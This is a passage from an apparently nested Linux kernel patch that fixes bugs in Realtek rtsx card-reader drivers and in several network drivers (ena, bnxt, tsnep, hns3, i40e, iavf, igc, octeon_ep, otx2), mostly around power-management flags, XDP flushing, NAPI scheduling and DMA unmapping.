+ 	rtsx_pci_write_register(pcr, 0xFC03, 0x7F, 0x07);
+@@ -539,6 +511,17 @@ static int rts5260_extra_init_hw(struct rtsx_pcr *pcr)
+ 
+ 	rts5260_init_hw(pcr);
+ 
++	/*
++	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
++	 * to drive low, and we forcibly request clock.
++	 */
++	if (option->force_clkreq_0)
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
++	else
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
++
+ 	rtsx_pci_write_register(pcr, pcr->reg_pm_ctrl3, 0x10, 0x00);
+ 
+ 	return 0;
+diff --git a/drivers/misc/cardreader/rts5261.c b/drivers/misc/cardreader/rts5261.c
+index 94af6bf8a25a6..67252512a1329 100644
+--- a/drivers/misc/cardreader/rts5261.c
++++ b/drivers/misc/cardreader/rts5261.c
+@@ -454,54 +454,17 @@ static void rts5261_init_from_hw(struct rtsx_pcr *pcr)
+ 
+ static void rts5261_init_from_cfg(struct rtsx_pcr *pcr)
+ {
+-	struct pci_dev *pdev = pcr->pci;
+-	int l1ss;
+-	u32 lval;
+ 	struct rtsx_cr_option *option = &pcr->option;
+ 
+-	l1ss = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_L1SS);
+-	if (!l1ss)
+-		return;
+-
+-	pci_read_config_dword(pdev, l1ss + PCI_L1SS_CTL1, &lval);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_2_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
+-		rtsx_set_dev_flag(pcr, PM_L1_1_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
+-		rtsx_set_dev_flag(pcr, PM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_2_EN);
+-
+-	rtsx_pci_write_register(pcr, ASPM_FORCE_CTL, 0xFF, 0);
+ 	if (option->ltr_en) {
+-		u16 val;
+-
+-		pcie_capability_read_word(pdev, PCI_EXP_DEVCTL2, &val);
+-		if (val & PCI_EXP_DEVCTL2_LTR_EN) {
+-			option->ltr_enabled = true;
+-			option->ltr_active = true;
++		if (option->ltr_enabled)
+ 			rtsx_set_ltr_latency(pcr, option->ltr_active_latency);
+-		} else {
+-			option->ltr_enabled = false;
+-		}
+ 	}
+ }
+ 
+ static int rts5261_extra_init_hw(struct rtsx_pcr *pcr)
+ {
++	struct rtsx_cr_option *option = &pcr->option;
+ 	u32 val;
+ 
+ 	rtsx_pci_write_register(pcr, RTS5261_AUTOLOAD_CFG1,
+@@ -547,6 +510,17 @@ static int rts5261_extra_init_hw(struct rtsx_pcr *pcr)
+ 	else
+ 		rtsx_pci_write_register(pcr, PETXCFG, 0x30, 0x00);
+ 
++	/*
++	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
++	 * to drive low, and we forcibly request clock.
++	 */
++	if (option->force_clkreq_0)
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
++	else
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
++
+ 	rtsx_pci_write_register(pcr, PWD_SUSPEND_EN, 0xFF, 0xFB);
+ 
+ 	if (pcr->rtd3_en) {
+diff --git a/drivers/misc/cardreader/rtsx_pcr.c b/drivers/misc/cardreader/rtsx_pcr.c
+index a3f4b52bb159f..a30751ad37330 100644
+--- a/drivers/misc/cardreader/rtsx_pcr.c
++++ b/drivers/misc/cardreader/rtsx_pcr.c
+@@ -1326,11 +1326,8 @@ static int rtsx_pci_init_hw(struct rtsx_pcr *pcr)
+ 			return err;
+ 	}
+ 
+-	if (pcr->aspm_mode == ASPM_MODE_REG) {
++	if (pcr->aspm_mode == ASPM_MODE_REG)
+ 		rtsx_pci_write_register(pcr, ASPM_FORCE_CTL, 0x30, 0x30);
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
+-	}
+ 
+ 	/* No CD interrupt if probing driver with card inserted.
+ 	 * So we need to initialize pcr->card_exist here.
+@@ -1345,7 +1342,9 @@ static int rtsx_pci_init_hw(struct rtsx_pcr *pcr)
+ 
+ static int rtsx_pci_init_chip(struct rtsx_pcr *pcr)
+ {
+-	int err;
++	struct rtsx_cr_option *option = &(pcr->option);
++	int err, l1ss;
++	u32 lval;
+ 	u16 cfg_val;
+ 	u8 val;
+ 
+@@ -1430,6 +1429,48 @@ static int rtsx_pci_init_chip(struct rtsx_pcr *pcr)
+ 			pcr->aspm_enabled = true;
+ 	}
+ 
++	l1ss = pci_find_ext_capability(pcr->pci, PCI_EXT_CAP_ID_L1SS);
++	if (l1ss) {
++		pci_read_config_dword(pcr->pci, l1ss + PCI_L1SS_CTL1, &lval);
++
++		if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
++			rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
++		else
++			rtsx_clear_dev_flag(pcr, ASPM_L1_1_EN);
++
++		if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
++			rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
++		else
++			rtsx_clear_dev_flag(pcr, ASPM_L1_2_EN);
++
++		if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
++			rtsx_set_dev_flag(pcr, PM_L1_1_EN);
++		else
++			rtsx_clear_dev_flag(pcr, PM_L1_1_EN);
++
++		if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
++			rtsx_set_dev_flag(pcr, PM_L1_2_EN);
++		else
++			rtsx_clear_dev_flag(pcr, PM_L1_2_EN);
++
++		pcie_capability_read_word(pcr->pci, PCI_EXP_DEVCTL2, &cfg_val);
++		if (cfg_val & PCI_EXP_DEVCTL2_LTR_EN) {
++			option->ltr_enabled = true;
++			option->ltr_active = true;
++		} else {
++			option->ltr_enabled = false;
++		}
++
++		if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
++				| PM_L1_1_EN | PM_L1_2_EN))
++			option->force_clkreq_0 = false;
++		else
++			option->force_clkreq_0 = true;
++	} else {
++		option->ltr_enabled = false;
++		option->force_clkreq_0 = true;
++	}
++
+ 	if (pcr->ops->fetch_vendor_settings)
+ 		pcr->ops->fetch_vendor_settings(pcr);
+ 
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 5ce01ac72637e..42a66b74c1e5b 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -1778,6 +1778,9 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 	return work_done;
+ 
+ error:
++	if (xdp_flags & ENA_XDP_REDIRECT)
++		xdp_do_flush();
++
+ 	adapter = netdev_priv(rx_ring->netdev);
+ 
+ 	if (rc == -ENOSPC) {
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 969db3c45d176..e81cb825dff4c 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -2654,6 +2654,7 @@ static int bnxt_poll_nitroa0(struct napi_struct *napi, int budget)
+ 	struct rx_cmp_ext *rxcmp1;
+ 	u32 cp_cons, tmp_raw_cons;
+ 	u32 raw_cons = cpr->cp_raw_cons;
++	bool flush_xdp = false;
+ 	u32 rx_pkts = 0;
+ 	u8 event = 0;
+ 
+@@ -2688,6 +2689,8 @@ static int bnxt_poll_nitroa0(struct napi_struct *napi, int budget)
+ 				rx_pkts++;
+ 			else if (rc == -EBUSY)	/* partial completion */
+ 				break;
++			if (event & BNXT_REDIRECT_EVENT)
++				flush_xdp = true;
+ 		} else if (unlikely(TX_CMP_TYPE(txcmp) ==
+ 				    CMPL_BASE_TYPE_HWRM_DONE)) {
+ 			bnxt_hwrm_handler(bp, txcmp);
+@@ -2707,6 +2710,8 @@ static int bnxt_poll_nitroa0(struct napi_struct *napi, int budget)
+ 
+ 	if (event & BNXT_AGG_EVENT)
+ 		bnxt_db_write(bp, &rxr->rx_agg_db, rxr->rx_agg_prod);
++	if (flush_xdp)
++		xdp_do_flush();
+ 
+ 	if (!bnxt_has_work(bp, cpr) && rx_pkts < budget) {
+ 		napi_complete_done(napi, rx_pkts);
+diff --git a/drivers/net/ethernet/engleder/tsnep_main.c b/drivers/net/ethernet/engleder/tsnep_main.c
+index 6bf3cc11d2121..2be518db04270 100644
+--- a/drivers/net/ethernet/engleder/tsnep_main.c
++++ b/drivers/net/ethernet/engleder/tsnep_main.c
+@@ -65,8 +65,11 @@ static irqreturn_t tsnep_irq(int irq, void *arg)
+ 
+ 	/* handle TX/RX queue 0 interrupt */
+ 	if ((active & adapter->queue[0].irq_mask) != 0) {
+-		tsnep_disable_irq(adapter, adapter->queue[0].irq_mask);
+-		napi_schedule(&adapter->queue[0].napi);
++		if (napi_schedule_prep(&adapter->queue[0].napi)) {
++			tsnep_disable_irq(adapter, adapter->queue[0].irq_mask);
++			/* schedule after masking to avoid races */
++			__napi_schedule(&adapter->queue[0].napi);
++		}
+ 	}
+ 
+ 	return IRQ_HANDLED;
+@@ -77,8 +80,11 @@ static irqreturn_t tsnep_irq_txrx(int irq, void *arg)
+ 	struct tsnep_queue *queue = arg;
+ 
+ 	/* handle TX/RX queue interrupt */
+-	tsnep_disable_irq(queue->adapter, queue->irq_mask);
+-	napi_schedule(&queue->napi);
++	if (napi_schedule_prep(&queue->napi)) {
++		tsnep_disable_irq(queue->adapter, queue->irq_mask);
++		/* schedule after masking to avoid races */
++		__napi_schedule(&queue->napi);
++	}
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -924,6 +930,10 @@ static int tsnep_poll(struct napi_struct *napi, int budget)
+ 	if (queue->tx)
+ 		complete = tsnep_tx_poll(queue->tx, budget);
+ 
++	/* handle case where we are called by netpoll with a budget of 0 */
++	if (unlikely(budget <= 0))
++		return budget;
++
+ 	if (queue->rx) {
+ 		done = tsnep_rx_poll(queue->rx, napi, budget);
+ 		if (done >= budget)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 8aae179554a81..04c9baca1b0f8 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -3352,6 +3352,15 @@ static void hns3_set_default_feature(struct net_device *netdev)
+ 		  NETIF_F_HW_TC);
+ 
+ 	netdev->hw_enc_features |= netdev->vlan_features | NETIF_F_TSO_MANGLEID;
++
++	/* The device_version V3 hardware can't offload the checksum for IP in
++	 * GRE packets, but can do it for NvGRE. So default to disable the
++	 * checksum and GSO offload for GRE.
++	 */
++	if (ae_dev->dev_version > HNAE3_DEVICE_VERSION_V2) {
++		netdev->features &= ~NETIF_F_GSO_GRE;
++		netdev->features &= ~NETIF_F_GSO_GRE_CSUM;
++	}
+ }
+ 
+ static int hns3_alloc_buffer(struct hns3_enet_ring *ring,
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 884e45fb6b72e..3e1d202d60ce1 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -3662,9 +3662,14 @@ static u32 hclge_check_event_cause(struct hclge_dev *hdev, u32 *clearval)
+ static void hclge_clear_event_cause(struct hclge_dev *hdev, u32 event_type,
+ 				    u32 regclr)
+ {
++#define HCLGE_IMP_RESET_DELAY		5
++
+ 	switch (event_type) {
+ 	case HCLGE_VECTOR0_EVENT_PTP:
+ 	case HCLGE_VECTOR0_EVENT_RST:
++		if (regclr == BIT(HCLGE_VECTOR0_IMPRESET_INT_B))
++			mdelay(HCLGE_IMP_RESET_DELAY);
++
+ 		hclge_write_dev(&hdev->hw, HCLGE_MISC_RESET_STS_REG, regclr);
+ 		break;
+ 	case HCLGE_VECTOR0_EVENT_MBX:
+@@ -7454,6 +7459,12 @@ static int hclge_del_cls_flower(struct hnae3_handle *handle,
+ 	ret = hclge_fd_tcam_config(hdev, HCLGE_FD_STAGE_1, true, rule->location,
+ 				   NULL, false);
+ 	if (ret) {
++		/* if tcam config fail, set rule state to TO_DEL,
++		 * so the rule will be deleted when periodic
++		 * task being scheduled.
++		 */
++		hclge_update_fd_list(hdev, HCLGE_FD_TO_DEL, rule->location, NULL);
++		set_bit(HCLGE_STATE_FD_TBL_CHANGED, &hdev->state);
+ 		spin_unlock_bh(&hdev->fd_rule_lock);
+ 		return ret;
+ 	}
+@@ -8930,7 +8941,7 @@ static void hclge_update_overflow_flags(struct hclge_vport *vport,
+ 	if (mac_type == HCLGE_MAC_ADDR_UC) {
+ 		if (is_all_added)
+ 			vport->overflow_promisc_flags &= ~HNAE3_OVERFLOW_UPE;
+-		else
++		else if (hclge_is_umv_space_full(vport, true))
+ 			vport->overflow_promisc_flags |= HNAE3_OVERFLOW_UPE;
+ 	} else {
+ 		if (is_all_added)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index b1b14850e958f..72cf5145e15a2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -1909,7 +1909,8 @@ static void hclgevf_periodic_service_task(struct hclgevf_dev *hdev)
+ 	unsigned long delta = round_jiffies_relative(HZ);
+ 	struct hnae3_handle *handle = &hdev->nic;
+ 
+-	if (test_bit(HCLGEVF_STATE_RST_FAIL, &hdev->state))
++	if (test_bit(HCLGEVF_STATE_RST_FAIL, &hdev->state) ||
++	    test_bit(HCLGE_COMM_STATE_CMD_DISABLE, &hdev->hw.hw.comm_state))
+ 		return;
+ 
+ 	if (time_is_after_jiffies(hdev->last_serv_processed + HZ)) {
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index cb7cf672f6971..547e67d9470b7 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -4397,9 +4397,7 @@ int i40e_ndo_set_vf_port_vlan(struct net_device *netdev, int vf_id,
+ 		goto error_pvid;
+ 
+ 	i40e_vlan_stripping_enable(vsi);
+-	i40e_vc_reset_vf(vf, true);
+-	/* During reset the VF got a new VSI, so refresh a pointer. */
+-	vsi = pf->vsi[vf->lan_vsi_idx];
++
+ 	/* Locked once because multiple functions below iterate list */
+ 	spin_lock_bh(&vsi->mac_filter_hash_lock);
+ 
+@@ -4485,6 +4483,10 @@ int i40e_ndo_set_vf_port_vlan(struct net_device *netdev, int vf_id,
+ 	 */
+ 	vf->port_vlan_id = le16_to_cpu(vsi->info.pvid);
+ 
++	i40e_vc_reset_vf(vf, true);
++	/* During reset the VF got a new VSI, so refresh a pointer. */
++	vsi = pf->vsi[vf->lan_vsi_idx];
++
+ 	ret = i40e_config_vf_promiscuous_mode(vf, vsi->id, allmulti, alluni);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev, "Unable to config vf promiscuous mode\n");
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 543931c06bb17..06cfd567866c2 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -521,7 +521,7 @@ void iavf_down(struct iavf_adapter *adapter);
+ int iavf_process_config(struct iavf_adapter *adapter);
+ int iavf_parse_vf_resource_msg(struct iavf_adapter *adapter);
+ void iavf_schedule_reset(struct iavf_adapter *adapter, u64 flags);
+-void iavf_schedule_request_stats(struct iavf_adapter *adapter);
++void iavf_schedule_aq_request(struct iavf_adapter *adapter, u64 flags);
+ void iavf_schedule_finish_config(struct iavf_adapter *adapter);
+ void iavf_reset(struct iavf_adapter *adapter);
+ void iavf_set_ethtool_ops(struct net_device *netdev);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index fe912b1c468ef..c13b4fa659ee9 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -362,7 +362,7 @@ static void iavf_get_ethtool_stats(struct net_device *netdev,
+ 	unsigned int i;
+ 
+ 	/* Explicitly request stats refresh */
+-	iavf_schedule_request_stats(adapter);
++	iavf_schedule_aq_request(adapter, IAVF_FLAG_AQ_REQUEST_STATS);
+ 
+ 	iavf_add_ethtool_stats(&data, adapter, iavf_gstrings_stats);
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 22bc57ee24228..a39f7f0d6ab0b 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -322,15 +322,13 @@ void iavf_schedule_reset(struct iavf_adapter *adapter, u64 flags)
+ }
+ 
+ /**
+- * iavf_schedule_request_stats - Set the flags and schedule statistics request
++ * iavf_schedule_aq_request - Set the flags and schedule aq request
+  * @adapter: board private structure
+- *
+- * Sets IAVF_FLAG_AQ_REQUEST_STATS flag so iavf_watchdog_task() will explicitly
+- * request and refresh ethtool stats
++ * @flags: requested aq flags
+  **/
+-void iavf_schedule_request_stats(struct iavf_adapter *adapter)
++void iavf_schedule_aq_request(struct iavf_adapter *adapter, u64 flags)
+ {
+-	adapter->aq_required |= IAVF_FLAG_AQ_REQUEST_STATS;
++	adapter->aq_required |= flags;
+ 	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ }
+ 
+@@ -831,7 +829,7 @@ iavf_vlan_filter *iavf_add_vlan(struct iavf_adapter *adapter,
+ 		list_add_tail(&f->list, &adapter->vlan_filter_list);
+ 		f->state = IAVF_VLAN_ADD;
+ 		adapter->num_vlan_filters++;
+-		adapter->aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
++		iavf_schedule_aq_request(adapter, IAVF_FLAG_AQ_ADD_VLAN_FILTER);
+ 	}
+ 
+ clearout:
+@@ -853,7 +851,7 @@ static void iavf_del_vlan(struct iavf_adapter *adapter, struct iavf_vlan vlan)
+ 	f = iavf_find_vlan(adapter, vlan);
+ 	if (f) {
+ 		f->state = IAVF_VLAN_REMOVE;
+-		adapter->aq_required |= IAVF_FLAG_AQ_DEL_VLAN_FILTER;
++		iavf_schedule_aq_request(adapter, IAVF_FLAG_AQ_DEL_VLAN_FILTER);
+ 	}
+ 
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+@@ -1433,7 +1431,8 @@ void iavf_down(struct iavf_adapter *adapter)
+ 	iavf_clear_fdir_filters(adapter);
+ 	iavf_clear_adv_rss_conf(adapter);
+ 
+-	if (!(adapter->flags & IAVF_FLAG_PF_COMMS_FAILED)) {
++	if (!(adapter->flags & IAVF_FLAG_PF_COMMS_FAILED) &&
++	    !(test_bit(__IAVF_IN_REMOVE_TASK, &adapter->crit_section))) {
+ 		/* cancel any current operation */
+ 		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+ 		/* Schedule operations to close down the HW. Don't wait
+diff --git a/drivers/net/ethernet/intel/igc/igc_ethtool.c b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+index 511fc3f412087..9166fde40c772 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ethtool.c
++++ b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+@@ -867,6 +867,18 @@ static void igc_ethtool_get_stats(struct net_device *netdev,
+ 	spin_unlock(&adapter->stats64_lock);
+ }
+ 
++static int igc_ethtool_get_previous_rx_coalesce(struct igc_adapter *adapter)
++{
++	return (adapter->rx_itr_setting <= 3) ?
++		adapter->rx_itr_setting : adapter->rx_itr_setting >> 2;
++}
++
++static int igc_ethtool_get_previous_tx_coalesce(struct igc_adapter *adapter)
++{
++	return (adapter->tx_itr_setting <= 3) ?
++		adapter->tx_itr_setting : adapter->tx_itr_setting >> 2;
++}
++
+ static int igc_ethtool_get_coalesce(struct net_device *netdev,
+ 				    struct ethtool_coalesce *ec,
+ 				    struct kernel_ethtool_coalesce *kernel_coal,
+@@ -874,17 +886,8 @@ static int igc_ethtool_get_coalesce(struct net_device *netdev,
+ {
+ 	struct igc_adapter *adapter = netdev_priv(netdev);
+ 
+-	if (adapter->rx_itr_setting <= 3)
+-		ec->rx_coalesce_usecs = adapter->rx_itr_setting;
+-	else
+-		ec->rx_coalesce_usecs = adapter->rx_itr_setting >> 2;
+-
+-	if (!(adapter->flags & IGC_FLAG_QUEUE_PAIRS)) {
+-		if (adapter->tx_itr_setting <= 3)
+-			ec->tx_coalesce_usecs = adapter->tx_itr_setting;
+-		else
+-			ec->tx_coalesce_usecs = adapter->tx_itr_setting >> 2;
+-	}
++	ec->rx_coalesce_usecs = igc_ethtool_get_previous_rx_coalesce(adapter);
++	ec->tx_coalesce_usecs = igc_ethtool_get_previous_tx_coalesce(adapter);
+ 
+ 	return 0;
+ }
+@@ -909,8 +912,12 @@ static int igc_ethtool_set_coalesce(struct net_device *netdev,
+ 	    ec->tx_coalesce_usecs == 2)
+ 		return -EINVAL;
+ 
+-	if ((adapter->flags & IGC_FLAG_QUEUE_PAIRS) && ec->tx_coalesce_usecs)
++	if ((adapter->flags & IGC_FLAG_QUEUE_PAIRS) &&
++	    ec->tx_coalesce_usecs != igc_ethtool_get_previous_tx_coalesce(adapter)) {
++		NL_SET_ERR_MSG_MOD(extack,
++				   "Queue Pair mode enabled, both Rx and Tx coalescing controlled by rx-usecs");
+ 		return -EINVAL;
++	}
+ 
+ 	/* If ITR is disabled, disable DMAC */
+ 	if (ec->rx_coalesce_usecs == 0) {
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 2f3947cf513bd..1ac836a55cd31 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -6322,7 +6322,7 @@ static int igc_xdp_xmit(struct net_device *dev, int num_frames,
+ 	struct igc_ring *ring;
+ 	int i, drops;
+ 
+-	if (unlikely(test_bit(__IGC_DOWN, &adapter->state)))
++	if (unlikely(!netif_carrier_ok(dev)))
+ 		return -ENETDOWN;
+ 
+ 	if (unlikely(flags & ~XDP_XMIT_FLAGS_MASK))
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+index d4ec46d1c8cfb..61354f7985035 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+@@ -726,13 +726,13 @@ static netdev_tx_t octep_start_xmit(struct sk_buff *skb,
+ dma_map_sg_err:
+ 	if (si > 0) {
+ 		dma_unmap_single(iq->dev, sglist[0].dma_ptr[0],
+-				 sglist[0].len[0], DMA_TO_DEVICE);
+-		sglist[0].len[0] = 0;
++				 sglist[0].len[3], DMA_TO_DEVICE);
++		sglist[0].len[3] = 0;
+ 	}
+ 	while (si > 1) {
+ 		dma_unmap_page(iq->dev, sglist[si >> 2].dma_ptr[si & 3],
+-			       sglist[si >> 2].len[si & 3], DMA_TO_DEVICE);
+-		sglist[si >> 2].len[si & 3] = 0;
++			       sglist[si >> 2].len[3 - (si & 3)], DMA_TO_DEVICE);
++		sglist[si >> 2].len[3 - (si & 3)] = 0;
+ 		si--;
+ 	}
+ 	tx_buffer->gather = 0;
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_tx.c b/drivers/net/ethernet/marvell/octeon_ep/octep_tx.c
+index 5a520d37bea02..d0adb82d65c31 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_tx.c
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_tx.c
+@@ -69,12 +69,12 @@ int octep_iq_process_completions(struct octep_iq *iq, u16 budget)
+ 		compl_sg++;
+ 
+ 		dma_unmap_single(iq->dev, tx_buffer->sglist[0].dma_ptr[0],
+-				 tx_buffer->sglist[0].len[0], DMA_TO_DEVICE);
++				 tx_buffer->sglist[0].len[3], DMA_TO_DEVICE);
+ 
+ 		i = 1; /* entry 0 is main skb, unmapped above */
+ 		while (frags--) {
+ 			dma_unmap_page(iq->dev, tx_buffer->sglist[i >> 2].dma_ptr[i & 3],
+-				       tx_buffer->sglist[i >> 2].len[i & 3], DMA_TO_DEVICE);
++				       tx_buffer->sglist[i >> 2].len[3 - (i & 3)], DMA_TO_DEVICE);
+ 			i++;
+ 		}
+ 
+@@ -131,13 +131,13 @@ static void octep_iq_free_pending(struct octep_iq *iq)
+ 
+ 		dma_unmap_single(iq->dev,
+ 				 tx_buffer->sglist[0].dma_ptr[0],
+-				 tx_buffer->sglist[0].len[0],
++				 tx_buffer->sglist[0].len[3],
+ 				 DMA_TO_DEVICE);
+ 
+ 		i = 1; /* entry 0 is main skb, unmapped above */
+ 		while (frags--) {
+ 			dma_unmap_page(iq->dev, tx_buffer->sglist[i >> 2].dma_ptr[i & 3],
+-				       tx_buffer->sglist[i >> 2].len[i & 3], DMA_TO_DEVICE);
++				       tx_buffer->sglist[i >> 2].len[3 - (i & 3)], DMA_TO_DEVICE);
+ 			i++;
+ 		}
+ 
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_tx.h b/drivers/net/ethernet/marvell/octeon_ep/octep_tx.h
+index 2ef57980eb47b..21e75ff9f5e71 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_tx.h
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_tx.h
+@@ -17,7 +17,21 @@
+ #define TX_BUFTYPE_NET_SG        2
+ #define NUM_TX_BUFTYPES          3
+ 
+-/* Hardware format for Scatter/Gather list */
++/* Hardware format for Scatter/Gather list
++ *
++ * 63      48|47     32|31     16|15       0
++ * -----------------------------------------
++ * |  Len 0  |  Len 1  |  Len 2  |  Len 3  |
++ * -----------------------------------------
++ * |                Ptr 0                  |
++ * -----------------------------------------
++ * |                Ptr 1                  |
++ * -----------------------------------------
++ * |                Ptr 2                  |
++ * -----------------------------------------
++ * |                Ptr 3                  |
++ * -----------------------------------------
++ */
+ struct octep_tx_sglist_desc {
+ 	u16 len[4];
+ 	dma_addr_t dma_ptr[4];
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index 7af223b0a37f5..5704fb75fa477 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -29,7 +29,8 @@
+ static bool otx2_xdp_rcv_pkt_handler(struct otx2_nic *pfvf,
+ 				     struct bpf_prog *prog,
+ 				     struct nix_cqe_rx_s *cqe,
+-				     struct otx2_cq_queue *cq);
++				     struct otx2_cq_queue *cq,
++				     bool *need_xdp_flush);
+ 
+ static int otx2_nix_cq_op_status(struct otx2_nic *pfvf,
+ 				 struct otx2_cq_queue *cq)
+@@ -340,7 +341,7 @@ static bool otx2_check_rcv_errors(struct otx2_nic *pfvf,
+ static void otx2_rcv_pkt_handler(struct otx2_nic *pfvf,
+ 				 struct napi_struct *napi,
+ 				 struct otx2_cq_queue *cq,
+-				 struct nix_cqe_rx_s *cqe)
++				 struct nix_cqe_rx_s *cqe, bool *need_xdp_flush)
+ {
+ 	struct nix_rx_parse_s *parse = &cqe->parse;
+ 	struct nix_rx_sg_s *sg = &cqe->sg;
+@@ -356,7 +357,7 @@ static void otx2_rcv_pkt_handler(struct otx2_nic *pfvf,
+ 	}
+ 
+ 	if (pfvf->xdp_prog)
+-		if (otx2_xdp_rcv_pkt_handler(pfvf, pfvf->xdp_prog, cqe, cq))
++		if (otx2_xdp_rcv_pkt_handler(pfvf, pfvf->xdp_prog, cqe, cq, need_xdp_flush))
+ 			return;
+ 
+ 	skb = napi_get_frags(napi);
+@@ -389,6 +390,7 @@ static int otx2_rx_napi_handler(struct otx2_nic *pfvf,
+ 				struct napi_struct *napi,
+ 				struct otx2_cq_queue *cq, int budget)
+ {
++	bool need_xdp_flush = false;
+ 	struct nix_cqe_rx_s *cqe;
+ 	int processed_cqe = 0;
+ 
+@@ -410,13 +412,15 @@ process_cqe:
+ 		cq->cq_head++;
+ 		cq->cq_head &= (cq->cqe_cnt - 1);
+ 
+-		otx2_rcv_pkt_handler(pfvf, napi, cq, cqe);
